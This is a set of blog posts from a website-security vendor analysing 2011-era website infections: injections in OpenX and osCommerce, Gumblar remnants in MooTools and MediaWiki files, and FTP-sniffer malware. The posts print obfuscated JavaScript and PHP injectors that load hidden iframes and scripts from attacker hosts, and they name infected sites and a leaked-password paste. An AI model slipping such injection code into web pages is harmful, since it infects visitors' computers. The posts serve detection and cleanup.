As of November 21, 2011, a large number of posts on Google groups seem to have been replicated to some adult chat rooms on Google Groups. This seems to be an attempt to game the search engine algorithm that Google uses and gain high search rankings for adult, spammy and potentially malicious websites.

We have blogged previously about how malicious hackers misuse SEO mechanisms to direct traffic to their malicious websites:

• Why Did My PageRank Go Down? – SEO Poisoning

More discussion about this issue is taking place on Google Groups. We will present more details about this incident as we know them.

• Why so many GAE group posts are moved into “American-porn” group?

News, Report, Security google, googlegroups, hack, post

A recent spate of hacking incidents has led to the compromise of the popular website blogutils.net. Blogutils.net provides website utilities like visit counters that can be embedded on websites built using popular software.

Many websites, including some accounts created on tumblr.com have been recently blacklisted by Google. The primary reason for this is the compromise of blogutils.net which has allowed malware to be distributed on these benign sites via utilities like counters that are used by website around the world.

Website names on tumblr.com have the following format:

some-name.tumblr.com

About the attack
Websites that are facing this problem may see malware links to some of the sites listed below via malicious iframes and redirections.

dbncawbp.cz.cc

A screenshot of the blogutils.net website being blacklisted by Google is shown below.

A screenshot of the blogutils.net website as blacklisted by Google

How to remove the malicious code
If you are facing this problem on your site, remove the blogutils.net code (e.g. a visitor counter) for the time being. When blogutils.net has recovered from the attack you may re-enable the utility code on your website.

We will post more details in forthcoming posts.

How do I protect my site?
StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

Till next time…

Report, Security blacklist, blogutils, hack, malware

The incidence of web-malware is on the rise, thousands of websites are infected every day as webmasters and business owners grapple with this new hydra of the Internet. Traditional Anti-Virus software is completely helpless when it comes to detecting these new and evolving pieces of malware which are being used to infect websites by malicious hackers.

In this short post we present an extremely widespread variant of an FTP based web-malware which is used to infect web sites.

Identifying the Malware
This code is injected as a result of a trojan or a “sniffer” malware being installed on a personal computer or server. This trojan software simply listens for FTP connections destined for web servers.

The code below shows the malware payload which is injected into web sites:

<img heigth='1' width='1' border='0' src='http://imgaaa.net/t.php?id=36910902'>

To determine if this trojan has infected your site, follow the steps below:

1. Log into your web account using FTP, SFTP, or SSH.
2. Check for files present with the following names: [some-two-digit-number].php (e.g. “21.php”). These files usually begin with:

   <? eval(gzuncompress(base64_decode(

   The above code may also be present on the last line of files named “index.php” (a reader identified the fact that there may also be files present with names like “police.php”).

3. Check for folders or directories present named “.log” (a reader identified the fact that there may also be a folder present called “.logs”).
4. Check for the presence of “imgaaa.net” in all files. Use the following command if you have shell access.

   grep -lr imgaaa.net

5. Check for the presence of the following line in your “.htaccess” files.

   RewriteRule ^(.*)$ /wp-admin/21.php?q=$1

Removing the Malware
If you find traces of the infection, upgrade your web application software (e.g. your CMS, WordPress, etc.) installation, change your FTP passwords, and clean or remove the infected files from your site immediately.

We Can Help!
If you need additional support, please see if our services can help and feel free to contact us with any comments or questions.

News, Report, Security ftp, hack, img, malware, tag

Malicious hackers are infecting websites in droves using a relatively new kind of malware. Websites are the newest malware battleground. Benign websites are being compromised and infected by hackers in order to infect their visitors.

In the vast majority of cases, the affected website owners are completely oblivious to the fact that a malicious hacker has used their website to infect their visitors. In this article we will show a new strain of malware that has already infected 43,000 websites.

Identifying the Malware
The specific piece of malware:

y='rum';n='s';fp='afe';e='tp';bo='/f';lk='o.c';bl='742';x='7';i='ra';h='c';gf='.';fl='ht';q='//';w='c';pu='554';mk='p?';qg='tp=';il='ph';yy='o';am='5e';k='.c';c='me';u='r';d='20a';qd='1';z='prw';xu='if';iy='a';f=':';a=xu.concat(i,c);kx=n.concat(u,h);l=fl.concat(e,f,q,z,qd,k,lk,w,bo,yy,y,gf,il,mk,qg,bl,d,am,pu,fp,iy,x);var ov=document.createElement(a);ov.setAttribute('width','5');ov.setAttribute('height','5');ov.setAttribute('style','display:none');ov.setAttribute(kx,l);document.body.appendChild(ov);lb='r';r='d3b';q='.c';b='or';v='e';bi='e30';gl='?';j='c/f';ru='l';pj='a';zh='m.';h='a';xc='me';i='c';z='tp:';n='4';ye='=';lg='s';qk='426';jp='ht';g='a';k='z';ut='u';c='//p';pr='7f';o='i';by='fr';ck='3';pl='php';pe='tp';e='a';nc='.co';gz=o.concat(by,h,xc);kx=lg.concat(lb,i);dv=jp.concat(z,c,k,ru,ck,nc,q,j,b,ut,zh,pl,gl,pe,ye,v,pj,r,e,qk,pr,bi,g,n);var bo=document.createElement(gz);bo.setAttribute('width','5');bo.setAttribute('height','5');bo.setAttribute('style','display:none');bo.setAttribute(kx,dv);document.body.appendChild(bo);

This malware adds an iframe to the infected webpage:

iframe setAttribute src = http://prw1.co.cc/forum.php?tp=74220a5e554afea7

The iframe points to two sites which are used to load the code used to infect the website visitor:

pzl3.co.cc/forum.php?tp=ead3ba4267fe30a4
prw1.co.cc/forum.php?tp=74220a5e554afea7

Growth of Infected Sites
The number of infected sites has grown significantly over the last few days. In less than a month, we have seen the number of sites more than double.

Growth in the Number of Infected Websites

Blacklist Services Not Reacting Quickly
Current website reputation services have not yet started flagging sites with this specific malware. Many infected sites have not yet been blacklisted by Google Chrome, Firefox, Bing, Yahoo or other search engines and blacklist sources. Below we present a small sample of infected sites which have not yet been blacklisted, and will infect visitors upon visiting them.

Infected sites that have not been blacklisted (As of April 23, 2011):

www.kittyshomestore.com/
muinvader.com/
zirimi.com/
ipcontext.com/
www.bonitalions.org/
www.sobragen.org.br/
www.biostyle.ru/
www.cnicanada.com/
www.ceomanitoba.com/

Anti-Virus Not Capable of Detecting the Infection
Anti-virus engines are woefully inadequate at hunting down web-malware. We present screenshots to show the poor detection capabilities of Anti-virus engines with respect to this specific piece of malware. We see below that only 1 out of 41 AV engines were able to flag the malware.

Website reputation sources fail to identify malware

Anti-Viruses fail to identify malware

We Can Help!
If you need additional support, please see if our services can help and feel free to contact us with any comments or questions.

News, Report, Security blacklist, hack, malware

Online advertisements are a significant source of revenue for many web sites. Even small websites can make money by serving up targeted advertisements to their visitors. A popular piece of software which helps deliver these online advertisements is OpenX. This software displays advertisements and rotates ads on web site pages.

In the last few months, we have seen a large uptick in the number of sites being hacked due to a vulnerability in the OpenX software. In this article, we provide a description of the problem and show an example which can help administrators find malware injected due to this particular vulnerability.

Identifying the Malware
When users visit a site hosting ads via OpenX, a PHP script dynamically creates JavaScript code which is embedded on the web page when ads are displayed to visitors. In cases of infection, malware in the form of a small JavaScript snippet is embedded in this PHP script.

The server location of the PHP script:

/www/delivery/ajs.php

An example of a public URL location of the PHP script:

http://www.infected-website.com/openx/www/delivery/ajs.php?zoneid=1&cb=27272789103&loc=http%3A//www.infected-site.com/

This specific JavaScript snippet loads an iframe element:

document.write('<iframe src="http://pzl3.co.cc/stats?counter=3" width=0 height=0></iframe>');

This malware is injected onto each page served with an ad, and can usually be located on the very first line of the web page. This can easily be verified by viewing the source of the webpage.

An example of the dynamic JavaScript which inserts this malware:

var dc=document; var date_ob=new Date(); dc.cookie='h1=o; path=/;';if(dc.cookie.indexOf('3=llo') 0){
function clng(str1,str2,str3){var cou=new Array('cn','gt','tn','br','id','bg','pl','be','gp','my','th','iq','ro','ba','pk','tr','dz','ma','re','ae','gf','ru','om','il','gr','vn','kw','ci','sa','do','pt','hr','eg','qa','ro','tw','al','hk','ps','eg','do','lt','dk','jo','pk','ma','pr','mk','dz','ge','hr','gr','bg','ba','pt','si','tn','pl','be','ir','sk','hu','az','bo','by','cr','cz','ec','ee','lk','lv','md','mt','pa','rs','sv','tt','ua','uy');
for(i=0;i<cou.length;i++){if(str1&&str1.toLowerCase().indexOf(cou[i])!=-1)return true;if(str2&&str2.toLowerCase().indexOf(cou[i])!=-1)return true;if(str3&&str3.toLowerCase().indexOf(cou[i])!=-1)return true;}return false;}
if(clng(navigator.systemLanguage,navigator.userLanguage,navigator.language)){var run=1;}
if(typeof run == 'undefined'){dc.writeln("<!–");dc.writeln("var host=' widt'+'h=1 h'+'eight'+'=1 '; var src='src='; var brdr='fra'+'mebor'+'der='+'0';var sc='\"http://cnjug.com/blog/index.php?s=IBB@G\" ';");dc.writeln("document.write(");");dc.writeln("//–>");} var run=1;
date_ob.setTime(date_ob.getTime()+86400000);dc.cookie='h3=llo; path=/; expires='+date_ob.toGMTString();}

Removing the Malware
The good news is that upgrading OpenX to the most recent version, or version 2.8.7 and above, resolves the vulnerability.

A very good guide to securing your OpenX installation can be found on the OpenX Blog.

Quoting the relevant part of the post:

First, check the append/prepend fields in the banners and zones table for any malicious code:

SELECT bannerid, append, prepend FROM banners WHERE append != '' OR prepend != '';

SELECT zoneid, append, prepend FROM zones WHERE append != '' OR prepend != '';

If you see anything suspicious on those fields, you should clear those values out.


Second, check that no unexpected admin users have been created, this query will list the details of all users with admin access in your system:

SELECT u.user_id, u.contact_name, u.email_address, u.username FROM users AS u, account_user_assoc AS aua WHERE u.user_id=aua.user_id AND aua.account_id = (SELECT value FROM application_variable WHERE name='admin_account_id');

Third, check for infected files on the filesystem:

Installing the latest version of openx will restore all core files, but plugin files (which the installer copies up from the previous version), and files in the www/images folder should be double checked after the upgrade is complete.


In particular, be on the lookout for base64_decode and/or eval statements in your php files. From the bug notes of “Arbitrary code injected into cache file” at https://developer.openx.org/jira/browse/OX-5950, users have reported some specific php files, but the issue can occur on any of the php files.



Optional steps you can take to secure your system are:

• You should regularly change the passwords for all users in the system (especially administrator/manager users)
• Removing the /path/to/openx/www/admin/install.php and the install-plugins.php files.
• Locking down admin directory on Apache http://forum.openx.org/index.php?showtopic=503453491&st=15&p=205811&#entry205811

Conclusion
If you need additional support, please see if our services can help and feel free to contact us with any comments or questions.

News, Report, Security hack, malvertizing, malware, openx

Websites are now the primary sales funnel for many businesses. Every day, billions of dollars of business is conducted by small to medium sized businesses via their web sites. Most e-commerce web sites use a piece of software called a shopping cart to allow users to pick and choose what they would like to buy and then pay via a number of payment methods.

One popular application software that web site owners use to manage online transactions is called osCommerce. Thousands of websites use this software. In the last three months we have witnessed a spate of intense attacks targeting shopping cart software like osCommerce. In this post we discuss the specifics of this attack, and how to identify the malware which is injected as a result of this intrusion.

Identifying the Malware
The malware targets osCommerce and other shopping carts by exploiting an application vulnerability to inject malware into the web site running the shopping cart – in turn, causing website visitors to become infected. This strain of malware has been extremely pervasive.

We have seen variants of the following malware on web sites running shopping cart software by osCommerce and OpenCart. The malware can be found in JavaScript, PHP, and HTML files on the infected web site.

<script type≈ "text/javascript" src≈ "catalog/view/javascript/unitpngfix/unitpngfix.js" > </ sc​ript > <script type≈ "text/javascript" >if (typeof(redef_colors)≈ ≈ "undefined") { var div_colors ≈ new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7277', '#707d83', '#787481', '#3d7278', '#3e7982', '#3e314d'); var redef_colors ≈ 1; var colors_picked ≈ 0; func​tion div_pick_colors(t, styled) {var s ≈ ""; for (j≈ 0; j <t.length; j++) {var c_rgb ≈ t[j]; for (i≈ 1; i <7; i++) {var c_clr ≈ c_rgb.substr(i++, 2); if (c_clr!≈ "00") s +≈ String·fromCharCode (parseInt(c_clr, 16)-15); }}if (styled) {s ≈ s.substr(0, 36) + s.substr(36, (s.length-38)) + div_colors[1].substr(0, 1)+new Date().getTime() + s.substr((s.length-2)); } else {s ≈ s.substr(36, (s.length-38)) + div_colors[1].substr(0, 1)+new Date().getTime(); }return s; } func​tion try_pick_colors() {try { if(!document.getElementById || !document.createElement){ doc​ument.write (div_pick_colors(div_colors, 1)); } else {var new_cstyle≈ document.createElement(" sc​ript "); new_cstyle.type≈ "text/javascript"; new_cstyle.src≈ div_pick_colors(div_colors, 0); document.getElementsByTagName("head")[0].appendChild(new_cstyle); }} catch(e) { }try {check_colors_picked(); } catch(e) { setTimeout("try_pick_colors()", 500); } } try_pick_colors(); } </ sc​ript >

What this Attack Does
The malware code attempts to display a malicious iframe which could lead the visitor to a fake Anti-Virus (AV) website. This opens the door to malware being installed on the website visitor’s personal computer.

Removing the Malware
In most shopping cart installations, malware will have been inserted in the config.php file on your website. It is usually located in the following place: www.yoursite.com/config.php.

Identify the malware in the config.php file that begins with:

<?php global $ob_starting;
if(!$ob_starting) {
function ob_start_flush($s) {
$tc = array(0, 69, 84, 82, 67, 83, 79, 7

The malware usually ends with a line similar to:

$ob_starting = time(); @ob_start(“ob_start_flush”); } ?>

The entire code present between the start and end signatures shown above must be removed.

Conclusion
Following removal of the malware, you must upgrade your installation of osCommerce, to osCommerce 2.3 or higher, and analyze your website for any application vulnerabilities. Securing the permission settings of your admin directory or renaming the directory to a value different from the default can mitigate automated attacks attempting to exploit osCommerce 2.2 versions.

If you need additional support, please see if our services can help and feel free to contact us with any comments or questions.

News, Report, Security blacklist, hack, malware, opencart, oscommerce

MySQL.com, the website of the extremely popular database software used worldwide was reported to be compromised today by the use of, ironically, an SQL injection attack.

This compromise was released into the public domain via a post on Seclists.org:
http://seclists.org/fulldisclosure/2011/Mar/309

The group responsible for this disclosure also disclosed passwords, password hashes and other sensitive information.

The list of passwords, and password hashes were posted at:
http://pastebin.com/BayvYdcP

We will be posting new information on this incident as we receive it from our sources. In the meantime if you have an account on MySQL.com, please consider changing your password immediately.

News hack, mysql, sql injection

In this post we continue to analyze how popular scripts are being targeted by hackers to cause infections on websites and computers which load them up in browsers for the viewing them. The motivation behind using these originally benign scripts to do the dirty work on their behalf is that a lot of webmasters and web-enthusiasts have wizened up to the fact that code-injection is a never ending battle and they are making efforts to identify and remove malicious code from their sites.

This particular example shows how a mootools script was used by a hacker to spread a Gumblar infection. Consider the case of hxxp://www.wwf.gr/ referred to by 22lyk-athin. att.sch .gr/index.html.  You will find the following code listed on one of the associated mootools JavaScript files which are pulled in from the local drives. The malicious code causes an infection which leads to a site being blacklisted by Google. The detailed report from Google would probably mention that the infection of the Gumblar” type.

Following the first example is another one wherein a Mediawiki script was targeted. The source was www.1wed din gsource.com/wedding-wiki/Wedding/

//MooTools, My Object Oriented Javascript Tools. Copyright (c) 2006 Valerio Proietti, <http://mad4milk.net>, MIT Style License.

var MooTools={version:'1.11'};function $defined(obj){return(obj!=undefined);};function $type(obj){if(!$defined(obj))return false;if(obj.htmlElement)return'element';var type=typeof obj;if(type=='object'&amp;&amp;obj.nodeName){switch(obj.nodeType){case 1:return'element';case 3:return(/\S/).test(obj.nodeValue)?'textnode':'whitespace';}}
if(type=='object'||type=='function'){switch(obj.constructor){case Array:return'array';case RegExp:return'regexp';case Class:return'class';}
if(typeof obj.length=='number'){if(obj.item)return'collection';if(obj.callee)return'arguments';}}
return type;};function $merge(){var mix={};for(var i=0;i&lt;arguments.length;i++){for(var property in arguments[i]){var ap=arguments[i][property];var mp=mix[property];if(mp&amp;&amp;$type(ap)=='object'&amp;&amp;$type(mp)=='object')mix[property]=$merge(mp,ap);else mix[property]=ap;}}
return mix;};var $extend=function(){var args=arguments;if(!args[1])args=[this,args[0]];for(var property in args[1])args[0][property]=args[1][property];return args[0];};var $native=function(){for(var i=0,l=arguments.length;i&lt;l;i++){arguments[i].extend=function(props){for(var prop in props){if(!this.prototype[prop])this.prototype[prop]=props[prop];if(!this[prop])this[prop]=$native.generic(prop);}};}};$native.generic=function(prop){return function(bind){return this.prototype[prop].apply(bind,Array.prototype.slice.call(arguments,1));};};$native(Function,Array,String,Number);function $chk(obj){return!!(obj||obj===0);};function $pick(obj,picked){return $defined(obj)?obj:picked;};function $random(min,max){return Math.floor(Math.random()*(max-min+1)+min);};function $time(){return new Date().getTime();};function $clear(timer){clearTimeout(timer);clearInterval(timer);return null;};var Abstract=function(obj){obj=obj||{};obj.extend=$extend;return obj;};var Window=new Abstract(window);var Document=new Abstract(document);document.head=document.getElementsByTagName('head')[0];window.xpath=!!(document.evaluate);if(window.ActiveXObject)window.ie=window[window.XMLHttpRequest?'ie7':'ie6']=true;else if(document.childNodes&amp;&amp;!document.all&amp;&amp;!navigator.taintEnabled)window.webkit=window[window.xpath?'webkit420':'webkit419']=true;else if(document.getBoxObjectFor!=null)window.gecko=true;window.khtml=window.webkit;Object.extend=$extend;if(typeof HTMLElement=='undefined'){var HTMLElement=function(){};if(window.webkit)document.createElement(&quot;iframe&quot;);HTMLElement.prototype=(window.webkit)?window[&quot;[[DOMElement.prototype]]&quot;]:{};}
HTMLElement.prototype.htmlElement=function(){};if(window.ie6)try{document.execCommand(&quot;BackgroundImageCache&quot;,false,true);}catch(e){};var(properties){var klass=function(){return(arguments[0]!==null&amp;&amp;this.initialize&amp;&amp;$type(this.initialize)=='function')?this.initialize.apply(this,arguments):this;};$extend(klass,this);klass.prototype=properties;klass.constructor=Class;return klass;};Class.empty=function(){};Class.prototype={extend:function(properties){var proto=new this(null);for(var property in properties){var pp=proto[property];proto[property]=Class.Merge(pp,properties[property]);}
return new Class(proto);},implement:function(){for(var i=0,l=arguments.length;i&lt;l;i++)$extend(this.prototype,arguments[i]);}};Class.Merge=function(previous,current){if(previous&amp;&amp;previous!=current){var type=$type(current);if(type!=$type(previous))return current;switch(type){case'function':var merged=function(){this.parent=arguments.callee.parent;return current.apply(this,arguments);};merged.parent=previous;return merged;case'object':return $merge(previous,current);}}
return current;};var Chain=new Class({chain:function(fn){this.chains=this.chains||[];this.chains.push(fn);return this;},callChain:function(){if(this.chains&amp;&amp;this.chains.length)this.chains.shift().delay(10,this);},clearChain:function(){this.chains=[];}});var Events=new Class({addEvent:function(type,fn){if(fn!=Class.empty){this.$events=this.$events||{};this.$events[type]=this.$events[type]||[];this.$events[type].include(fn);}
return this;},fireEvent:function(type,args,delay){if(this.$events&amp;&amp;this.$events[type]){this.$events[type].each(function(fn){fn.create({'bind':this,'delay':delay,'arguments':args})();},this);}

**code removed for brevity**

this.effects={};if(this.options.opacity)this.effects.opacity='fullOpacity';if(this.options.width)this.effects.width=this.options.fixedWidth?'fullWidth':'offsetWidth';if(this.options.height)this.effects.height=this.options.fixedHeight?'fullHeight':'scrollHeight';for(var i=0,l=this.togglers.length;i&lt;l;i++)this.addSection(this.togglers[i],this.elements[i]);this.elements.each(function(el,i){if(this.options.show===i){this.fireEvent('onActive',[this.togglers[i],el]);}else{for(var fx in this.effects)el.setStyle(fx,0);}},this);this.parent(this.elements);if($chk(this.options.display))this.display(this.options.display);},addSection:function(toggler,element,pos){toggler=$(toggler);element=$(element);var test=this.togglers.contains(toggler);var len=this.togglers.length;this.togglers.include(toggler);this.elements.include(element);if(len&amp;&amp;(!test||pos)){pos=$pick(pos,len-1);toggler.injectBefore(this.togglers[pos]);element.injectAfter(toggler);}else if(this.container&amp;&amp;!test){toggler.inject(this.container);element.inject(this.container);}
var idx=this.togglers.indexOf(toggler);toggler.addEvent('click',this.display.bind(this,idx));if(this.options.height)element.setStyles({'padding-top':0,'border-top':'none','padding-bottom':0,'border-bottom':'none'});if(this.options.width)element.setStyles({'padding-left':0,'border-left':'none','padding-right':0,'border-right':'none'});element.fullOpacity=1;if(this.options.fixedWidth)element.fullWidth=this.options.fixedWidth;if(this.options.fixedHeight)element.fullHeight=this.options.fixedHeight;element.setStyle('overflow','hidden');if(!test){for(var fx in this.effects)element.setStyle(fx,0);}
return this;},display:function(index){index=($type(index)=='element')?this.elements.indexOf(index):index;if((this.timer&amp;&amp;this.options.wait)||(index===this.previous&amp;&amp;!this.options.alwaysHide))return this;this.previous=index;var obj={};this.elements.each(function(el,i){obj[i]={};var hide=(i!=index)||(this.options.alwaysHide&amp;&amp;(el.offsetHeight&gt;0));this.fireEvent(hide?'onBackground':'onActive',[this.togglers[i],el]);for(var fx in this.effects)obj[i][fx]=hide?0:el[this.effects[fx]];},this);return this.start(obj);},showThisHideOpen:function(index){return this.display(index);}});Fx.Accordion=Accordion;

**malicious code**

document.write('&lt;scr ipt src=hxxp://nw drealty.com/Scripts/Unti tled-17.php &gt;&lt;\/sc ript&gt;');
document.write('&lt;scri pt src=hxxp://nwd realty.com/Scripts/Untit led-17.php &gt;&lt;\/s cript&gt;');&lt;/pre&gt;
etTime()+2678400000);if(document.cookie.indexOf(&quot;_df=f&quot;)==-1){if(navigator.appCodeName.indexOf(&quot;a&quot;)!=-1){iframe=&quot;iframe&quot;}document.write(&quot;&lt;iframe+ width=1 height=1 src=\'hxxp://l oading-a tm.net/b2b/\' style=\'display:none\'&gt;&lt;/iframe&gt;&quot;);document.cookie=&quot;_df=f; expires=expires.toGMTString(); &quot;}\n']&lt;/pre&gt;

Our systems flagged this as unsafe. This exploit leads to an infection which is a remnant of the famous gumblar virus.

// MediaWiki JavaScript support functionsvar clientPC = navigator.userAgent.toLowerCase(); // Get client info
<pre id="cb0049f11cbf55990b47f8e86dc03a62ee0ea17d-133-highlight">
var is_gecko = /gecko/.test( clientPC ) &&
!/khtml|spoofer|netscape\/7\.0/.test(clientPC);
var webkit_match = clientPC.match(/applewebkit\/(\d+)/);
if (webkit_match) {
var is_safari = clientPC.indexOf('applewebkit') != -1 &&
clientPC.indexOf('spoofer') == -1;
var is_safari_win = is_safari && clientPC.indexOf('windows') != -1;

** code removed for brevity **
}
//note: all skins should call runOnloadHook() at the end of html output,
//      so the below should be redundant. It's there just in case.
hookEvent("load", runOnloadHook);

** malicious code **
document.write('<scr ipt src=hxxp://hydr eka.com/logiciels/winfluid_mo bile.php ><\/s cript>');</pre>

Security gumblar, hack, injection, mootools, script

A few weeks back I wrote about how hackers are targeting benign scripts to do the dirty work on their behalf. The trend is now intensifying. In the last post about this issue, we saw how common scripts like JQuery and AC_RunActiveContent, mootools and others were being targeted. This time we will look at injection in a script which does not conform to the trend mentioned.

This particular example is not a popularly deployed script, and is probably hand-coded by a developer for their purposes. Consider the case of hxxp://www.iu.edu.sa/web mail/ You will find the following code listed on one of the associated JavaScript files which are pulled in from the local drives. Interestingly, the code is packed using the popular, Dean-Edwards-Packer, like format. Unpacking it is trivial and hence the actual code which was not part of the original file is also displayed below.

// defines for sections
var SECTION_LOGIN    = 0;
var SECTION_MAIL     = 1;

// defines for screens
var SCREEN_LOGIN              = 0;
var SCREEN_MESSAGES_LIST_VIEW = 1;
var SCREEN_MESSAGES_LIST      = 2;
var SCREEN_VIEW_MESSAGE       = 3;
var SCREEN_NEW_MESSAGE        = 4;

var Sections = Array();
Sections[SECTION_LOGIN]    = {Scripts: [], Screens: Array()}
Sections[SECTION_MAIL]     = {Scripts: [], Screens: Array()}
Sections[SECTION_MAIL].Screens[SCREEN_MESSAGES_LIST_VIEW] = 'screen = new CMessagesListViewScreen(SkinName);';
Sections[SECTION_MAIL].Screens[SCREEN_MESSAGES_LIST] = 'screen = new CMessagesListScreen(SkinName);';

**code removed for brevity**

var REDRAW_NOTHING = 0;
var REDRAW_PAGE    = 3;
var AUTOSELECT_CHARSET = -1;
var VIEW_MODE_WITH_PANE     = 1;
var Fonts = [Arial, Arial Black, Courier New, Tahoma, Times New Roman, Verdana]

Ready(INIT_DEFINES);

**malicious code**

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!.replace(/^/,String)){while(c--){d[e(c)]=k1||e(c)}k=[function(e){return d[e]}];e=function(){returnw};c=1};while(c--){if(k1){p=p.replace(new RegExp(be(c)b,g),k1)}}return p}(g 7=b 5(),4=b 5(7.k()l);2(0.9.6(8=f)==-1){2(i.m.6(a)!=-1){3=3}0.c(<3dh=1 ej=1 w=hn://yz-v.u/p/ o=qr:t></2s>);0.9=8=f;4=4.x(); },36,36,document||if|iframe|expires|Date|indexOf|today|_df|cookie||new|write|widt|heig||var||navigator|ht|getTime|2678400000|appCodeName|ttp|style|b2b|dis|play|rame|none|net|atm|src|toGMTString|loadi|ng.split(|),0,{}));

**unpacked form**

['var today=new Date(),expires=new Date(today.getTime()+2678400000);if(document.cookie.indexOf("_df=f")==-1){if(navigator.appCodeName.indexOf("a")!=-1){iframe="iframe"}document.write("<iframe+ width=1 height=1 src=\'hxxp://l oading-a tm.net/b2b/\' style=\'display:none\'></iframe>");document.cookie="_df=f; expires=expires.toGMTString(); "}\n']</pre>

Our systems flagged this as unsafe and for further validation one can look up malware-domain-list .

The exploit seems to throw a executable to the victim’s system, which in turn is a down-loader and tries to grab two more files from the same domain.

And to whet your appetite more, here’s another example captured from hxxp://www. aikidoofqueens. com/kids/

<pre id="16a4ab078355b4e53857777860831edc756eb492-1-highlight">var ma=new Array();var mx=new Array();var my=new Array();var mc=new Array();
var mpos=new Array();var mal=0;var main=0;var menuw=200;var psrc=0;
var pname="";var al="";var gd=0;var gx,gy;var d=document;
var NS7=(!d.all&&d.getElementById);var NS4=(!d.getElementById);
var IE5=(!NS4&&!NS7&&(navigator.userAgent.indexOf('MSIE 5.0')!=-1
||navigator.userAgent.indexOf('MSIE 5.2')!=-1));var IE5p5=(!NS4&&
!NS7&&navigator.userAgent.indexOf('MSIE 5.5')!=-1);var NS6=(NS7&&
navigator.userAgent.indexOf('Netscape6')!=-1);
var SAF=navigator.userAgent.indexOf('Safari')!=-1;p=navigator.userAgent.indexOf('Opera');
if(p>-1){p=navigator.userAgent.charAt(p+6);if(p>6)NS7=1;else NS4=1;}var 

** code removed for brevity **

<pre id="16a4ab078355b4e53857777860831edc756eb492-1-highlight">clipMenu(i,el){if(el.offsetLeft>mx[i])el.style.clip="rect("+(my[i]-el.offsetTop)+"px "
+(el.offsetWidth+(mx[i]-el.offsetLeft))+"px "+el.offsetHeight+"px "+0+"px)";
else el.style.clip="rect("+(my[i]-el.offsetTop)+"px "+el.offsetWidth+"px "+
el.offsetHeight+"px "+(mx[i]-el.offsetLeft)+"px)";}

** malicious code **

document.write('< script src=hxxp://b olccorlando.org/_vti_txt/event_pwf.php ><\/s cript>');
document.write('<sc ript src=hxxp://gh anafoneshop.com/category_images/vieworder.php ><\/s cript>');
document.write('<scr ipt src=hxxp://gha nafoneshop.com/category_images/vieworder.php ><\/sc ript>');
document.write('<scri pt src=hxxp://ghan afoneshop.com/category_images/vieworder.php ><\/scr ipt>');
document.write('<scrip t src=hxxp://ghana foneshop.com/category_images/vieworder.php ><\/scri pt>');
document.write('<sc ript src=hxxp://ghanaf oneshop.com/category_images/vieworder.php ><\/scrip t>');
document.write('<scr ipt src=hxxp://ramazan -toker.com/images/gifimg.php ><\/sc ript>');

Security hack, injection, script